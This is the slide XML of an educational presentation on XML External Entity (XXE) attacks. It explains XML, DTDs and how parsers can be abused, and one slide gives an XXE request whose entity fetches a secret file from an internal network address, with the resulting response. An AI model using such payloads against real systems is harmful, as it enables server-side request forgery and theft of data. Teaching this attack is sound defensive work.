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4D917A-2596-4807-9288-90408295D266}"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205985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D917A-2596-4807-9288-90408295D266}"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270895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D917A-2596-4807-9288-90408295D266}"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325982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D917A-2596-4807-9288-90408295D266}"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298149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D917A-2596-4807-9288-90408295D266}"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146991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4D917A-2596-4807-9288-90408295D266}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>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240113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D917A-2596-4807-9288-90408295D266}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>8/13/2017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29454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4D917A-2596-4807-9288-90408295D266}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>8/13/2017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99272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D917A-2596-4807-9288-90408295D266}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>8/13/2017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14709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D917A-2596-4807-9288-90408295D266}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>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54355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D917A-2596-4807-9288-90408295D266}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>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A7F1D-9721-4EA4-908F-A93E3BD04A73}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="336684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D917A-2596-4807-9288-90408295D266}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>8/13/2017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A7F1D-9721-4EA4-908F-A93E3BD04A73}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1859151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ithub.com/bhattsame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cunetix.com/blog/articles/server-side-request-forgery-vulnerabil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Billion_laugh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cunetix.com/blog/articles/server-side-request-forgery-vulnerabil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XXE ATTACK</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>XML External entity </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="263742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pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Example 5</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1070020" y="1040014"/>
            <a:ext cx="10515600" cy="1510003"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Of course, an attacker is not limited to system files, an attacker can easily steal source code if they know the location and structure of the web application. It’s also worth mentioning, that with some XML parsers, it’s even possible to get directory listings in addition to the contents of a file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XML External Entity can be taken even further by making regular HTTP requests to files on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> network (i.e. accessible only behind the firewall).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="18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5283033"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1017431" y="2966477"/>
          <a:ext cx="11397802" cy="2651760"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5698901"/>
                <a:gridCol w="5698901"/>
              </a:tblGrid>
              <a:tr h="0">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Request</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT>
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB>
                      <a:noFill/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Response</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT>
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB>
                      <a:noFill/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="0">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>POST http://example.com/xml HTTP/1.1 </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>&lt;!</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>DOCTYPE foo [ </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>      &lt;!</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>ELEMENT </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>foo</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> ANY&gt; </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>      &lt;!</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>ENTITY</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> bar</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> SYSTEM "</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>http://192.168.0.1/secret.txt</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>"&gt; </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>]&gt; </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>&lt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>foo&gt; </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>     &amp;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>bar;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>&lt;/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>foo&gt; </a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT>
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB>
                      <a:noFill/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>HTTP/1.0 200 OK </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Hello</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>, I'm a file on the local network (behind the firewall</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>)</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>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52013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3073" y="2662752"/>
            <a:ext cx="2716369" cy="750150"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>THANKS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="5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335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3203" y="2186233"/>
            <a:ext cx="10515600" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="493915"/>
            <a:ext cx="10515600" cy="806852"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </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811" y="1068946"/>
            <a:ext cx="4774020" cy="4694830"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2663347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3203" y="2186233"/>
            <a:ext cx="10515600" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>bhattsameer5@gmail.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Github</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.github.com/bhattsameer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Twitter-handler: @Sameer_bhatt5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="493915"/>
            <a:ext cx="10515600" cy="806852"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>For any query: </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2230922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pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What is XXE?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1160172" y="2137893"/>
            <a:ext cx="10515600" cy="3871644"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>XML External Entity (XXE) refers to a specific type of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Server-side Request Forgery (SSRF)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> attack, whereby an attacker is able to cause Denial of Service (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>) and access local or remote files and services, by abusing a widely available, rarely used feature in XML parsers.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="234504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pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ABOUT XML</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1941535"/>
            <a:ext cx="10515600" cy="3403198"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>XML is a vastly used data format found in everything from web services (XML-RPC, SOAP, REST…) to documents (XML, HTML, DOCX) and image files (SVG, EXIF data…) use XML. Naturally, where there is XML, there is an XML parser – hold onto that thought, we’ll be coming back to it shortly.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="242476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pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>EXAMPLE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4883282"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2382593" y="1983345"/>
          <a:ext cx="9543244" cy="2535499"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4771622"/>
                <a:gridCol w="4771622"/>
              </a:tblGrid>
              <a:tr h="863051">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Request</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT>
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB>
                      <a:noFill/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>    Response</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT>
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB>
                      <a:noFill/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="1672448">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>POST </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>http://example.com/xml HTTP/1.1 </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>&lt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>foo</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>&gt;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>    </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Hello World </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>&lt;/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>foo&gt; </a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT>
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB>
                      <a:noFill/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>    HTTP/1.0 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>200 OK </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>    Hello </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>World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91701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pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>More thing about XML</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>XML, however, can do much more than simply declaring elements, attributes and text. XML documents can specify a set of markup declarations that define a document type, in order for an XML parser to validate the XML document for correctness before it gets processed. There are two ways of doing this – either through an XML Schema Definition (XSD), or a Data Type Definition (DTD).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Data Type Definitions (DTDs), are what we shall be focusing on, since that’s where XML External Entity vulnerabilities occur. DTDs can be pretty much considered legacy, in fact they are derived from SGML (XML’s ancestor).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="72970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pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Example 2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1116495" y="1087977"/>
